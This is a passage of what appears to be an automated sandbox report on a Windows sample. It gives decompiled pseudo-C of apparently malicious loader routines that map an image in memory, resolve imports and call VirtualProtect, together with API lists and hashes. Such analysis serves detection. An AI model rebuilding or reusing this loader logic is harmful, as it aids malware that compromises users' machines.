                                                						if(__eflags >= 0) {
                                                							goto L9;
                                                						}
                                                						goto L8;
                                                					}
                                                					asm("bt [esi+0x24], eax");
                                                					if(_t60 >= 0) {
                                                						_t54 = _t57 - 0x63699ba3;
                                                					} else {
                                                						_t54 = _t57 - 0x63699b83;
                                                					}
                                                					goto L9;
                                                				}
                                                				goto L12;
                                                			}












                                                0x004011c5
                                                0x004011d2
                                                0x004011d8
                                                0x004011e4
                                                0x004011f4
                                                0x004011f6
                                                0x004011fe
                                                0x00401293
                                                0x0040129a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00401204
                                                0x00401204
                                                0x00401204
                                                0x00401208
                                                0x00000000
                                                0x00000000
                                                0x00401214
                                                0x00401218
                                                0x0040123c
                                                0x00401240
                                                0x00401254
                                                0x00401254
                                                0x0040125a
                                                0x00401269
                                                0x0040126d
                                                0x00401275
                                                0x00401275
                                                0x0040127d
                                                0x00401280
                                                0x0040128d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040128d
                                                0x00401248
                                                0x0040124c
                                                0x00401252
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00401252
                                                0x00401220
                                                0x00401224
                                                0x0040122e
                                                0x00401226
                                                0x00401226
                                                0x00401226
                                                0x00000000
                                                0x00401224
                                                0x00000000

                                                APIs
                                                • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 004011F4
                                                • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401269
                                                • GetLastError.KERNEL32 ref: 0040126F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ProtectVirtual$ErrorLast
                                                • String ID:
                                                • API String ID: 1469625949-0
                                                • Opcode ID: 13ac2bc9e9f46e05be1d656d5ed462c932d10965494d7770a3a4c34ce117b016
                                                • Instruction ID: 5c0c75dacf335e2e7d7b495eff5825f205165f4f424c647c1b48c5ec8c6a31d6
                                                • Opcode Fuzzy Hash: 13ac2bc9e9f46e05be1d656d5ed462c932d10965494d7770a3a4c34ce117b016
                                                • Instruction Fuzzy Hash: 98218031800206EFCB14DF95C985AAAF7F5FF48309F0049AED102B75A0E3B8A694CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00401B73() {
                                                				char _v16;
                                                				intOrPtr _v28;
                                                				void _v32;
                                                				void* _v36;
                                                				intOrPtr _t15;
                                                				void* _t16;
                                                				long _t25;
                                                				int _t26;
                                                				void* _t30;
                                                				intOrPtr* _t32;
                                                				signed int _t36;
                                                				intOrPtr _t39;
                                                
                                                				_t15 =  *0x403104;
                                                				if( *0x4030ec > 5) {
                                                					_t16 = _t15 + 0x4040f9;
                                                				} else {
                                                					_t16 = _t15 + 0x4040b1;
                                                				}
                                                				E00401892(_t16, _t16);
                                                				_t36 = 6;
                                                				memset( &_v32, 0, _t36 << 2);
                                                				if(E004019DC( &_v32,  &_v16,  *0x403100 ^ 0xfd7cd1cf) == 0) {
                                                					_t25 = 0xb;
                                                				} else {
                                                					_t26 = lstrlenW( *0x4030f8);
                                                					_t8 = _t26 + 2; // 0x2
                                                					_t11 = _t26 + _t8 + 8; // 0xa
                                                					_t30 = E00401791(_t39, _t11,  &_v32,  &_v36); // executed
                                                					if(_t30 == 0) {
                                                						_t32 = _v36;
                                                						 *_t32 = 0;
                                                						if( *0x4030f8 == 0) {
                                                							 *((short*)(_t32 + 4)) = 0;
                                                						} else {
                                                							E00401E90(_t44, _t32 + 4);
                                                						}
                                                					}
                                                					_t25 = E00401554(_v28); // executed
                                                				}
                                                				ExitThread(_t25);
                                                			}















                                                0x00401b79
                                                0x00401b8a
                                                0x00401b94
                                                0x00401b8c
                                                0x00401b8c
                                                0x00401b8c
                                                0x00401b9b
                                                0x00401ba4
                                                0x00401ba9
                                                0x00401bc7
                                                0x00401c1e
                                                0x00401bc9
                                                0x00401bcf
                                                0x00401bd5
                                                0x00401be3
                                                0x00401be7
                                                0x00401bee
                                                0x00401bf0
                                                0x00401bfc
                                                0x00401bfe
                                                0x00401c0d
                                                0x00401c00
                                                0x00401c06
                                                0x00401c06
                                                0x00401bfe
                                                0x00401c15
                                                0x00401c15
                                                0x00401c20

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ExitThreadlstrlen
                                                • String ID:
                                                • API String ID: 2636182767-0
                                                • Opcode ID: a30c8d59b5c7a5337bb52b497652b0f54164998f6b601e18451d3e5e9b2a7c3d
                                                • Instruction ID: d29dd65c829992ff87be0fa86199fae10a41f243dbd19fecf21a89631c8961ce
                                                • Opcode Fuzzy Hash: a30c8d59b5c7a5337bb52b497652b0f54164998f6b601e18451d3e5e9b2a7c3d
                                                • Instruction Fuzzy Hash: 96119072508201AEE711DB65CD49D9B7BECAB48304F05843BB215F71B1E734E5498B5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 37%
                                                			E00401892(void* __eax, intOrPtr _a4) {
                                                
                                                				 *0x403110 =  *0x403110 & 0x00000000;
                                                				_push(0);
                                                				_push(0x40310c);
                                                				_push(1);
                                                				_push(_a4);
                                                				 *0x403108 = 0xc; // executed
                                                				L0040154E(); // executed
                                                				return __eax;
                                                			}



                                                0x00401892
                                                0x00401899
                                                0x0040189b
                                                0x004018a0
                                                0x004018a2
                                                0x004018a6
                                                0x004018b0
                                                0x004018b5

                                                APIs
                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401BA0,00000001,0040310C,00000000), ref: 004018B0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: DescriptorSecurity$ConvertString
                                                • String ID:
                                                • API String ID: 3907675253-0
                                                • Opcode ID: 87ffaa43b5a6a371b4edf9b8e144d114447b7136c5282677a1ceecb1ff090bac
                                                • Instruction ID: 56b16ec160d46bb37124d60ec731f93fac125714b773117a58110631e1762432
                                                • Opcode Fuzzy Hash: 87ffaa43b5a6a371b4edf9b8e144d114447b7136c5282677a1ceecb1ff090bac
                                                • Instruction Fuzzy Hash: AEC04C74244310B7E6109F009D47F457E55B79870AF205529B1103C1E183F95254895D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00401554(void* __eax) {
                                                				char _v8;
                                                				void* _v12;
                                                				void* __edi;
                                                				void* _t18;
                                                				long _t24;
                                                				long _t26;
                                                				long _t29;
                                                				intOrPtr _t40;
                                                				void* _t41;
                                                				intOrPtr* _t42;
                                                				void* _t44;
                                                
                                                				_t41 = __eax;
                                                				_t16 =  *0x403100;
                                                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x63698bc4 &  !( *0x403100 - 0x63698bc4);
                                                				_t18 = E00401D12( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x63698bc4 &  !( *0x403100 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x63698bc4 &  !( *0x403100 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                				if(_t18 != 0) {
                                                					_t29 = 8;
                                                					goto L8;
                                                				} else {
                                                					_t40 = _v8;
                                                					_t29 = E00401E0F(_t33, _t40, _t41);
                                                					if(_t29 == 0) {
                                                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                						_t24 = E00401303(_t40, _t44); // executed
                                                						_t29 = _t24;
                                                						if(_t29 == 0) {
                                                							_t26 = E004011BB(_t44, _t40); // executed
                                                							_t29 = _t26;
                                                							if(_t29 == 0) {
                                                								_push(_t26);
                                                								_push(1);
                                                								_push(_t40);
                                                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                									_t29 = GetLastError();
                                                								}
                                                							}
                                                						}
                                                					}
                                                					_t42 = _v12;
                                                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                					E00401722(_t42);
                                                					L8:
                                                					return _t29;
                                                				}
                                                			}














                                                0x0040155c
                                                0x0040155e
                                                0x0040157a
                                                0x0040158b
                                                0x00401592
                                                0x004015f0
                                                0x00000000
                                                0x00401594
                                                0x00401594
                                                0x0040159e
                                                0x004015a2
                                                0x004015a7
                                                0x004015aa
                                                0x004015af
                                                0x004015b3
                                                0x004015b8
                                                0x004015bd
                                                0x004015c1
                                                0x004015c6
                                                0x004015c7
                                                0x004015cb
                                                0x004015d0
                                                0x004015d8
                                                0x004015d8
                                                0x004015d0
                                                0x004015c1
                                                0x004015b3
                                                0x004015da
                                                0x004015e3
                                                0x004015e7
                                                0x004015f1
                                                0x004015f7
                                                0x004015f7

                                                APIs
                                                  • Part of subcall function 00401D12: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401590,?,?,?,?,?,00000002,?,?), ref: 00401D36
                                                  • Part of subcall function 00401D12: GetProcAddress.KERNEL32(00000000,?), ref: 00401D58
                                                  • Part of subcall function 00401D12: GetProcAddress.KERNEL32(00000000,?), ref: 00401D6E
                                                  • Part of subcall function 00401D12: GetProcAddress.KERNEL32(00000000,?), ref: 00401D84
                                                  • Part of subcall function 00401D12: GetProcAddress.KERNEL32(00000000,?), ref: 00401D9A
                                                  • Part of subcall function 00401D12: GetProcAddress.KERNEL32(00000000,?), ref: 00401DB0
                                                  • Part of subcall function 00401E0F: memcpy.NTDLL(00000002,?,0040159E,?,?,?,?,?,0040159E,?,?,?,?,?,?,?), ref: 00401E3C
                                                  • Part of subcall function 00401E0F: memcpy.NTDLL(00000002,?,?,?,00000002,?,?), ref: 00401E6F
                                                  • Part of subcall function 00401303: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040133B
                                                  • Part of subcall function 004011BB: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 004011F4
                                                  • Part of subcall function 004011BB: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401269
                                                  • Part of subcall function 004011BB: GetLastError.KERNEL32 ref: 0040126F
                                                • GetLastError.KERNEL32(?,?), ref: 004015D2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                • String ID:
                                                • API String ID: 2673762927-0
                                                • Opcode ID: cb3694a7f8921da43fac16d8356b180e89c367bb888dca2303579507656b8588
                                                • Instruction ID: ca458f6132754aa858b510e62446a0f37d86f89ea1457d66992c105363d99edb
                                                • Opcode Fuzzy Hash: cb3694a7f8921da43fac16d8356b180e89c367bb888dca2303579507656b8588
                                                • Instruction Fuzzy Hash: 0E110B766007157BD731ABA6CD80D9B77BCAFC8304704013AF902BB6A1DAB4ED0687A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 100%
                                                			E00401AFF() {
                                                				void* _t1;
                                                				long _t3;
                                                				void* _t4;
                                                				long _t5;
                                                				void* _t6;
                                                				intOrPtr _t8;
                                                				void* _t12;
                                                
                                                				_t8 =  *0x4030f0;
                                                				_t1 = CreateEventA(0, 1, 0, 0);
                                                				 *0x4030fc = _t1;
                                                				if(_t1 == 0) {
                                                					return GetLastError();
                                                				}
                                                				_t3 = GetVersion();
                                                				if(_t3 != 5) {
                                                					L4:
                                                					if(_t12 <= 0) {
                                                						_t4 = 0x32;
                                                						return _t4;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				} else {
                                                					if(_t3 > 0) {
                                                						L5:
                                                						 *0x4030ec = _t3;
                                                						_t5 = GetCurrentProcessId();
                                                						 *0x4030e8 = _t5;
                                                						 *0x4030f0 = _t8;
                                                						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                						 *0x4030e4 = _t6;
                                                						if(_t6 == 0) {
                                                							 *0x4030e4 =  *0x4030e4 | 0xffffffff;
                                                						}
                                                						return 0;
                                                					} else {
                                                						_t12 = _t3 - _t3;
                                                						goto L4;
                                                					}
                                                				}
                                                			}










                                                0x00401b00
                                                0x00401b0e
                                                0x00401b16
                                                0x00401b1b
                                                0x00401b6d
                                                0x00401b6d
                                                0x00401b1d
                                                0x00401b25
                                                0x00401b2d
                                                0x00401b2d
                                                0x00401b69
                                                0x00401b6b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00401b27
                                                0x00401b29
                                                0x00401b2f
                                                0x00401b2f
                                                0x00401b34
                                                0x00401b42
                                                0x00401b47
                                                0x00401b4d
                                                0x00401b55
                                                0x00401b5a
                                                0x00401b5c
                                                0x00401b5c
                                                0x00401b66
                                                0x00401b2b
                                                0x00401b2b
                                                0x00000000
                                                0x00401b2b
                                                0x00401b29

                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040141A), ref: 00401B0E
                                                • GetVersion.KERNEL32 ref: 00401B1D
                                                • GetCurrentProcessId.KERNEL32 ref: 00401B34
                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401B4D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Process$CreateCurrentEventOpenVersion
                                                • String ID:
                                                • API String ID: 845504543-0
                                                • Opcode ID: bd3d811ef2885140ed792ab916c45427a7a9a2811c173d903416973678c6dec9
                                                • Instruction ID: ea6843d4e80dc3462b330f13c6c23bd891fabd7409840625015b523eb06228d1
                                                • Opcode Fuzzy Hash: bd3d811ef2885140ed792ab916c45427a7a9a2811c173d903416973678c6dec9
                                                • Instruction Fuzzy Hash: 73F0AF70A413119EE7209F68BF097963FA8A705B12F008076F205F62F4E3B45542CB1C
                                                Uniqueness

                                                Uniqueness Score: -1.00%